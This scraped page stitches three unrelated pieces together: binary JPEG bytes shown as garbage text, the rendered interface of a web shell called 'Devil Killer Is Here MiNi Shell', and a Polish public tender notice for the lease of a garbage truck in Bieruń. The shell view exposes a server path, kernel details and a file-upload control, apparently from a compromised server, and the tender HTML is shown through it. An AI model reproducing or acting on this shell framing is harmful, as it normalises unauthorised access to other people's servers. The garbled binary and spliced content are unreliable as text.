JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231004/0042773501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wraz z usługą leasingu nowego pojazdu specjalistycznego typu „śmieciarka” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Bieruńskie Przedsiębiorstwo Inżynierii Komunalnej Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276238012</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jagiełły 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bieruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-155</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">322162764</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bpik@bpik.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bpik.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka Gminna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wraz z usługą leasingu nowego pojazdu specjalistycznego typu „śmieciarka” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e8f1ea1a-62a8-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00427735</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. <br/>2.	Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. Poprzez oryginał należy rozumieć dokument podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. Poświadczenie za zgodność z oryginałem następuje w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. <br/>3.	Oferta powinna być:<br/>a.	sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>b.	złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl,<br/>c.	podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione.<br/>4.	Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>5.	W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.<br/>6.	Zgodnie z art. 18 ust. 3 ustawy Pzp, nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. Jeżeli wykonawca, nie później niż w terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, że nie mogą być one udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje się miejsce wyznaczone do dołączenia części oferty stanowiącej tajemnicę przedsiębiorstwa.<br/>7.	Wykonawca, za pośrednictwem platformazakupowa.pl może przed upływem terminu do składania ofert zmienić lub wycofać ofertę. Sposób dokonywania zmiany lub wycofania oferty zamieszczono w instrukcji zamieszczonej na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>8.	Zgodnie z definicją dokumentu elektronicznego z art.3 ustęp 2 Ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne, opatrzenie pliku zawierającego skompresowane dane kwalifikowanym podpisem elektronicznym jest jednoznaczne z podpisaniem oryginału dokumentu, z wyjątkiem kopii poświadczonych odpowiednio przez innego wykonawcę ubiegającego się wspólnie z nim o udzielenie zamówienia, przez podmiot, na którego zdolnościach lub sytuacji polega wykonawca, albo przez podwykonawcę.<br/>9.	Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA RODO <br/>Informacje dotyczące przetwarzania danych kontrahentów (przedsiębiorcy, jednoosobowe działalności gospodarcze, wspólnicy spółek cywilnych) 1. Administratorem Państwa danych jest Bieruńskie Przedsiębiorstwo Inżynierii Komunalnej Sp. z o.o. z siedzibą przy ul. Jagiełły 13, 43-155 Bieruń. Kontakt z administratorem możliwy jest poprzez tel. (032) 216-27-64, (032) 328-96-84 lub wiadomość kierowaną na adres e-mail: bpik@bpik.com.pl. 2. Administrator powołał inspektora ochrony danych (dalej IOD). Z IOD można kontaktować się we wszystkich sprawach dotyczących przetwarzania danych osobowych pod adresem e-mail: daneosobowe@bpik.com.pl. 3. Pani / Pana dane będą przetwarzane w następującym celu, zakresie i na wskazanej poniżej podstawie prawnej: 3.1. realizacji zawartej z Panią / Panem umowy, w tym przygotowania rozliczeń związanych z wykonywaniem zawartych z Panią / Panem umów, realizacji roszczeń z tytułu gwarancji lub rękojmi z niej wynikającej – cel ten obejmuje przetwarzanie w szczególności następujących kategorii danych: dane identyfikacyjne, dane adresowe, dane kontaktowe, nr rachunku bankowego. Przetwarzanie wyżej wymienionych danych osobowych odbywać się będzie na podstawie art. 6 ust. 1 lit. b) RODO. 3.2. archiwizacji dokumentów – cel ten obejmuje przetwarzanie w szczególności następujących kategorii danych: w zakresie danych: dane identyfikacyjne, dane adresowe, dane kontaktowe, nr rachunku bankowego. Przetwarzanie wyżej wymienionych danych osobowych odbywać się będzie na podstawie art. 6 ust. 1 lit. c) RODO w związku z przepisami prawa krajowego regulującego zagadnienia prowadzenia dokumentacji finansowej, rachunkowości i archiwizacji danych. 3.3. dochodzenia przysługujących administratorowi roszczeń, jak również w celu obrony przed ewentualnymi roszczeniami z Pani / Pana strony w tym przechowywania danych osobowych przez okres niezbędny do realizacji tego celu – obejmuje to przetwarzanie w szczególności następujących kategorii danych: dane identyfikacyjne, dane adresowe, numer rachunku bankowego. Przetwarzanie wyżej wymienionych danych osobowych odbywać się będzie na podstawie art. 6 ust. 1 f)<br/>Wszelkie dokumenty znajdują się na stronie internetowej zamwiającego <br/>www.bpik.com.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZŚ/10/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa wraz z finansowaniem w formie leasingu pojazdu typu „śmieciarka” wg poniższych parametrów: <br/><br/>Dane pojazdu:<br/><br/>1.	Rok produkcji: nie starszy niż: 2022 <br/>2.	Dopuszczalna masa całkowita pojazdu: minimum 26000<br/>3.	Silnik o mocy minimum 240 kW <br/>4.	Pojemność: minimum 9 dm3 Diesel <br/>5.	Norma emisji spalin EURO: 6<br/>6.	Zawieszenie mechaniczno/pneumatyczne bądź pneumatyczno – piórowe, <br/>7.	Koła o rozmiarze: 315x80 R 22,5, felgi stalowe. <br/>8.	Hamulce tarczowe <br/>9.	Elektroniczny system hamulcowy EBS<br/>10.	System zapobiegający blokowaniu kół ABS <br/>11.	Skrzynia biegów automatyczna<br/>12.	System pomocy przy ruszaniu <br/>13.	Sygnalizator cofania<br/>14.	Boczna belka przeciw-najazdowa<br/>15.	Fartuchy przeciw błotne przód i tył<br/>16.	Układ kierowniczy lewostronny, wspomagany hydraulicznie<br/>17.	Blokada mechanizmu różnicowego osi tylnych i/lub przednich <br/>18.	Hamulec silnikowy<br/>19.	Elektrycznie otwierane szyby kabiny<br/>20.	Korek wlewu paliwa zamykany na klucz<br/>21.	Kabina dzienna<br/>22.	Siedzenie kierowcy z zawieszeniem pneumatycznym<br/>23.	Fotele wyposażone w bezwładnościowe pasy bezpieczeństwa zagłówki <br/>24.	Lampa ostrzegawcza zamontowana na kabinie kogut lub belka<br/>25.	Kabina podnoszona hydraulicznie<br/>26.	Lusterka wsteczne regulowane elektrycznie podgrzewane<br/>27.	System ruszania pod górę <br/>28.	3 miejsca w kabinie <br/>29.	Tachograf cyfrowy <br/>30.	Regulacja kierownicy w dwóch płaszczyznach<br/>31.	Podgrzewany fotel kierowcy<br/>32.	Radio fabryczne i minimum dwa głośniki <br/>33.	Zbiornik paliwa minimum 300 litrów<br/>34.	Zbiornik paliwa aluminiowy <br/>35.	Podgrzewacz paliwa <br/>36.	Zbiornik adBlue <br/>37.	Chlapacze tylne<br/>38.	Chlapacze osi przedniej <br/>39.	Nadkola tylne<br/>40.	Komplet kołpaków<br/>41.	Immobilizer <br/>42.	Dywaniki podłogowe – gumowe<br/>43.	Tachograf <br/>44.	Ostrzeżenie przed opuszczaniem pasa ruchu <br/>45.	Klimatyzacja<br/>46.	Podnośnik<br/>47.	Kolor kabiny: biały <br/>48.	Pojazd przystosowany do montażu zewnętrznego systemu GPS oraz systemu monitoringu wizyjnego. <br/><br/>ZABUDOWA ŚMIECIARKI:<br/><br/>Rok produkcji minimum :2022<br/><br/>1.	Sztywna konstrukcja stalowa skrzyni ładunkowej całkowicie spawana i szczelna, <br/>2.	Spawy wodoszczelne, <br/>3.	Zabudowa skrzyniowa z urządzeniem załadowczym tylnym, przeznaczonym do zbierania odpadów gromadzonych w pojemnikach <br/>4.	Podłoga skrzyni ze stali typu Hardox o grubości minimum 6 mm<br/>5.	Pojemność zabudowy od 19,5 do 22 m3 <br/>6.	Hydrauliczne/mechaniczne blokowanie odwłoka <br/>7.	Maksymalnie możliwe zagęszczanie odpadu<br/>8.	Dwa wyłączniki awaryjne umieszczone w tylnej części pojazdu <br/>9.	Urządzenie załadowcze współpracujące z pojemnikami od 80 do 1100 litrów<br/>10.	Uszczelka wokół płyty zgniatającej <br/>11.	Pasy odblaskowe na kabinie i odwłoku <br/>12.	Zabudowa wielokrotnie gruntowana i lakierowana <br/>13.	Minimum jeden reflektor roboczy z tyłu zabudowy<br/>14.	Możliwość odczytu urządzenia rejestrujący cykl pracy: prasy zagęszczającej, podnoszenia, opuszczania odwłoka, oraz czasu pompy hydraulicznej <br/>15.	Siłowniki zgniatające <br/>16.	Urządzenie wyłączające przystawkę mocy <br/>17.	Awaryjny przycisk stop <br/>18.	Ochrona przed ewentualnym zgniecieniem podnoszonych pojemników <br/>19.	Stanowiska operatorskie wyposażone w przyciski bezpieczeństwa<br/>20.	Automatyczna praca systemu w celu usunięca resztek odpadów z wanny <br/>21.	Oświetlenie zgodnie przepisami o ruchu drogowym i EN 1501-1<br/>22.	Błotniki wykonane z tworzywa sztucznego <br/>23.	Komplet chlapaczy <br/>24.	Wydech spalinowy wyprowadzony w górę lub bok – dopasowany do zabudowy<br/>25.	Kolor skrzyni biały <br/>26.	Boczne belki zabezpieczające wjazd pod śmieciarkę <br/>27.	Gaśnica <br/>28.	Komplet wymaganego wyposażenie przez przepisy <br/>29.	Zabudowa kompatybilna z podwoziem <br/>28.	Światła robocze po bokach z przodu zabudowy.<br/><br/>Warunki finansowania: <br/>- Rodzaj leasingu: operacyjny<br/>- Leasing rozliczany w złotych polskich (PLN)<br/>- Równe opłaty leasingowe <br/>- Okres leasingu: 72 miesiące (71 rat leasingowych)<br/>- Płatność rat leasingu na podstawie harmonogramu rat leasingowych<br/>- Wartość wpłaty własnej Zamawiającego: 200.000,00 zł. <br/>- Kwota wykupu pojazdu- 1%<br/>- Zamawiający ubezpieczy pojazd we własnym zakresie (OC,AC,NW). Po zawarciu umowy ubezpieczenia Zamawiający przekaże Wykonawcy polisy do wglądu. Na zawartej polisie jako ubezpieczony wskazany będzie Wykonawca.<br/>- Oprocentowanie zmienne przy stopie procentowej WIBOR 1M. Do kalkulacji ofert należy przyjąć stawkę WIBOR 1M na dzień 02 października 2023 r<br/>- Koszty rejestracji pojazdu na podstawie przedłożonej przez Wykonawcę faktury VAT poniesie Zamawiający<br/>- Zamawiający poniesie koszty podatku od środków transportowych w formie refaktury<br/>- Zamawiający poniesie koszty innych opłat związanych z obsługą leasingu zgodnie z obowiązującą u Wykonawcy Tabelą Opłat i Prowizji. Opłaty muszą być powszechnie obowiązujące na rynku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144511-3 - Pojazdy do zbierania odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">72 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1	Cena <br/>Liczba punktów = ( Cmin/Cof ) * 80 * waga<br/><br/>gdzie: <br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/>2	Punkty w kryterium będą przyznane w następujący sposób: <br/>- termin realizacji dni od podpisania umowy: <br/>14 – ilość punktów 20 <br/>15-20 – ilość punktów 18 <br/>21 – 25 – ilość punktów: 15 <br/>26 – 30 – ilość punktów: 10 <br/>31 – 35 – ilość punktów: 8<br/>36 – 40 – ilość punktów: 5</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realiazcji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a.	Oświadczenie wykonawcy, w zakresie art 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą. Który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 3 do SWZ.<br/>b.	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. ł pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia, iż oferowane dostawy spełniają oczekiwania Zamawiającego Wykonawca <br/> wraz z ofertą złoży przedmiotowe środki dowodowe w postaci: <br/> - opis techniczny oferowanego pojazdu (opis przedmiotu zamówienia musi być szczegółowy i zgodny z wymogami zawartymi w SWZ)<br/>- warunkami finansowania leasingowego zgodnie z opisem zawartym w SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W celu potwierdzenia, iż oferowane dostawy spełniają oczekiwania Zamawiającego Wykonawca <br/> wraz z ofertą złoży przedmiotowe środki dowodowe w postaci: <br/> - opis techniczny oferowanego pojazdu (opis przedmiotu zamówienia musi być szczegółowy i zgodny z wymogami zawartymi w SWZ) <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2.	Ofertę składa się na Formularzu Ofertowym - zgodnie z Załącznikiem nr 1 do SWZ. <br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	oświadczenia, o których mowa w Rozdziale VI pkt 1 – SWZ – załącznik nr 2. <br/>2)	zobowiązanie innego podmiotu, o którym mowa w Rozdziale V pkt II SWZ (jeżeli dotyczy); <br/>3)	dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy).<br/> 4) Opis techniczny oferowanego pojazdu (opis przedmiotu zamówienia musi być <br/> szczegółowy i zgodny z wymogami zawartymi w SWZ) , wraz z warunkami finansowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Pełnomocnictwo, o którym mowa w pkt 1 musi znajdować się w ofercie.<br/>3.	Oferta 